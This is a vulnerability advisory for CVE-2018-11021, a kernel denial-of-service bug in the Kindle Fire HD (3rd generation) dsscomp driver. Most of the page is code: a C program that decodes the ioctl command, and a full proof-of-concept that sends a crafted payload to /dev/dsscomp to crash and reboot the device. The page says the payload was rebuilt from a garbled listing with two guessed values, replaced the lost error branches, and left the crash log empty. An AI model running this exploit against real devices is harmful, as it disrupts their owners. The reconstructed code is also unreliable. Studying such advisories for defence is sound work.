(CVE-2018-11021) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

1. Vulnerability summary

In Amazon Kindle Fire HD (3rd generation) Fire OS 4.5.5.3, the kernel module omap/drivers/video/omap2/dsscomp/device.c allows an attacker to inject a crafted argument through the ioctl interface of the device file /dev/dsscomp with command 1118064517 and crash the kernel. To trigger the bug, the device file /dev/dsscomp must be opened and the ioctl system call invoked on it with command 1118064517 and a crafted payload as the third argument. Any process that is permitted to open /dev/dsscomp and issue ioctl calls on it can therefore crash and reboot the device (a denial of service).

2. Affected versions

Fire OS 4.5.5.3
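Before building a payload for an ioctl it is worth decoding the request number to see what the driver expects from the third argument. The C program below is an added example, not code from this page or from the PoC's author: it redefines the generic Linux _IOC() field layout (the one ARM kernels such as the Fire OS target use) under its own IOC_* names so it builds on any host, and decodes 1118064517 to write direction, type 'O', request number 133 and a 676-byte argument, i.e. a 169-word struct. Number 133 under type 'O' is how the OMAP dsscomp header numbers DSSCOMP_SETUP_DISPC, consistent with the dsscomp_setup_dispc_data struct the PoC names. The ioc_payload_fits() check is the pre-flight test a practitioner would run before passing a hand-built buffer to ioctl(); DSSCOMP_CMD is the page's command, the IOC_* macros and helper names are this example's own.

```c
/* Added example (not part of the PoC on this page): decode the ioctl
 * request number 1118064517 into its _IOC() fields.  The field layout is
 * the generic Linux one from asm-generic/ioctl.h, which ARM (the Fire OS
 * target) uses; the macros are redefined here under IOC_* names so the
 * program builds without <sys/ioctl.h> on any host. */
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>

#define IOC_NRBITS     8
#define IOC_TYPEBITS   8
#define IOC_SIZEBITS   14
#define IOC_NRSHIFT    0
#define IOC_TYPESHIFT  (IOC_NRSHIFT + IOC_NRBITS)
#define IOC_SIZESHIFT  (IOC_TYPESHIFT + IOC_TYPEBITS)
#define IOC_DIRSHIFT   (IOC_SIZESHIFT + IOC_SIZEBITS)
#define IOC_NRMASK     ((1U << IOC_NRBITS) - 1)
#define IOC_TYPEMASK   ((1U << IOC_TYPEBITS) - 1)
#define IOC_SIZEMASK   ((1U << IOC_SIZEBITS) - 1)
#define IOC_DIRMASK    3U
#define IOC_NONE       0U
#define IOC_WRITE      1U
#define IOC_READ       2U

/* The command the PoC passes to ioctl(), as given on this page. */
#define DSSCOMP_CMD    1118064517U

static unsigned ioc_dir(uint32_t cmd)  { return (cmd >> IOC_DIRSHIFT)  & IOC_DIRMASK; }
static unsigned ioc_type(uint32_t cmd) { return (cmd >> IOC_TYPESHIFT) & IOC_TYPEMASK; }
static unsigned ioc_nr(uint32_t cmd)   { return (cmd >> IOC_NRSHIFT)   & IOC_NRMASK; }
static unsigned ioc_size(uint32_t cmd) { return (cmd >> IOC_SIZESHIFT) & IOC_SIZEMASK; }

/* Same packing as the kernel's _IOC(dir, type, nr, size). */
static uint32_t ioc_encode(unsigned dir, unsigned type, unsigned nr, unsigned size)
{
    return ((uint32_t)dir  << IOC_DIRSHIFT)  |
           ((uint32_t)type << IOC_TYPESHIFT) |
           ((uint32_t)nr   << IOC_NRSHIFT)   |
           ((uint32_t)size << IOC_SIZESHIFT);
}

/* Pre-flight check before handing a hand-built buffer to ioctl(): the
 * command must carry the write direction (the kernel copies the struct in
 * from the user pointer) and the buffer must cover the encoded size,
 * otherwise the kernel's copy_from_user reads beyond the buffer you meant
 * to pass. */
static int ioc_payload_fits(uint32_t cmd, size_t payload_len)
{
    return (ioc_dir(cmd) & IOC_WRITE) != 0 && payload_len >= ioc_size(cmd);
}

int main(void)
{
    unsigned size = ioc_size(DSSCOMP_CMD);
    printf("cmd %u = 0x%08x: dir=%u type='%c' nr=%u size=%u\n",
           DSSCOMP_CMD, DSSCOMP_CMD, ioc_dir(DSSCOMP_CMD), ioc_type(DSSCOMP_CMD),
           ioc_nr(DSSCOMP_CMD), size);
    printf("payload must be at least %u bytes (%u uint32 words)\n", size, size / 4);
    return 0;
}
```

The decoded size is the number to compare against sizeof(payload) in the PoC: a shorter array still reaches the driver, but the bytes the kernel reads past it are whatever happens to follow on the stack, which makes the crash non-deterministic.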
3. Reproduction

The PoC must be run on the device by a user that is allowed to open /dev/dsscomp and issue ioctl calls on it; a successful run crashes the kernel and the device reboots.

PoC:

/* This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
 * Related buggy struct name is dsscomp_setup_dispc_data.
 * This PoC should run with permission to do ioctl on /dev/dsscomp.
 */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

static const char *driver = "/dev/dsscomp";
static const unsigned int command = 1118064517U;   /* 0x42a44f85 */

int main(void)
{
    /* Payload transcribed from the listing on this page, which was badly
     * garbled by extraction ("0X" and "O" for "0x", "j" for ",", a dropped
     * "x" after a leading 0).  Two tokens were ambiguous and are read as
     * assumptions: 0x00000004 (listed as "0X000000004") and 0x21ffff37
     * (listed as "0x2:Iffff37"). */
    unsigned int payload[] = {
        0xffffffff, 0x00000003, 0x5d200040, 0x79900008, 0x8f5928bd, 0x78b02422,
        0x00000004, 0xffffffff, 0xf4c50400, 0x007fffff, 0x8499f562, 0xffff0400,
        0x001b131d, 0x60818210, 0x00000007, 0xffffffff, 0x00000000, 0x9da9041c,
        0xcd980400, 0x001f03f4, 0x00000007, 0x2a34003f, 0x7c80d8f3, 0x63102627,
        0xc73643a8, 0xa28f0665, 0x00000000, 0x689e57b4, 0x01ff0008, 0x5e7324b1,
        0xae3b003f, 0x0b174d86, 0x00000400, 0x21ffff37, 0xceb367a4, 0x00000040,
        0x00000001, 0xec000f9e, 0x00000001, 0x000001ff, 0x00000000, 0x00000000,
        0x0000000f, 0x0425c069, 0x038cc3be, 0x0000000f, 0x00000080, 0xe5790100,
        0x5b1bffff, 0x0000d355, 0x0000c685, 0xa0070000, 0x0010ffff, 0x00a0ff00,
        0x00000001, 0xff490700, 0x0832ad03, 0x00000006, 0x00000002, 0x00000001,
        0x81f871c0, 0x738019cb, 0xbf47ffff, 0x00000040, 0x00000001, 0x7f190f33,
        0x00000001, 0x8295769b, 0x0000003f, 0x869f2295, 0xffffffff, 0xd673914f,
        0x05055800, 0xed69b7d5, 0x00000000, 0x0107ebbd, 0xd214af8d, 0xffff4a93,
        0x26450008, 0x58df0000, 0xd16db084, 0x03ff30dd, 0x00000001, 0x209aff3b,
        0xe7850800, 0x00000002, 0x30da815c, 0x426f5105, 0x0de109d7, 0x2c1a65fc,
        0xfcb3d75f, 0x00000000, 0x00000001, 0x8066be5b, 0x00000002, 0xffffffff,
        0x5cf232ec, 0x680d1469, 0x00000001, 0x00000020, 0xffffffff, 0x00000400,
        0xd1d12be8, 0x02010200, 0x01ffc16f, 0xf6e237e6, 0x007f0000, 0x01ff08f8,
        0x000f00f9, 0xbad07695, 0x00000000, 0xbaff0000, 0x24040040, 0x00000006,
        0x00000004, 0x00000000, 0xbc2e9242, 0x009f5f08, 0x00800000, 0x00000000,
        0x00000001, 0xff8800ff, 0x00000001, 0x00000000, 0x000003f4, 0x6faa8472,
        0x00000400, 0xec857dd5, 0x00000000, 0x00000040, 0xffffffff, 0x3f004874,
        0x0000b77a, 0xec9acb95, 0xfacc0001, 0xffff0001, 0x0080ffff, 0x3600ff03,
        0x00000001, 0x8fff7d7f, 0x6b87075a, 0x00000000, 0x41414141, 0x41414141,
        0x41414141, 0x41414141, 0x001001ff, 0x00000000, 0x00000001, 0xff1f0512,
        0x00000001, 0x51e32167, 0xc18c55cc, 0x00000000, 0xffffffff, 0xb4aaf12b,
        0x86edfdbd, 0x00000010, 0x0000003f, 0xabff7b00, 0xffff9ea3, 0xb28e0040,
        0x000fffff, 0x458603f4, 0xffff007f, 0xa9030f02, 0x00000001, 0x002cffff,
        0x9e00cdff, 0x00000004, 0x41414141, 0x41414141, 0x41414141, 0x41414141
    };
    int fd;

    fd = open(driver, O_RDWR);
    if (fd < 0) {
        /* The original error branch is lost on this page (only the fragment
         * "data/local/tmp/log" survives); perror stands in for it. */
        perror("open");
        return -1;
    }

    printf("Try open %s with command 0x%x.\n", driver, command);
    printf("System will crash and reboot.\n");

    /* Third argument: the crafted struct dsscomp_setup_dispc_data. */
    if (ioctl(fd, command, payload) < 0) {
        /* Same as above: the original branch is garbled on this page. */
        perror("ioctl");
        close(fd);
        return -1;
    }

    close(fd);
    return 0;
}

Crash log

To be added here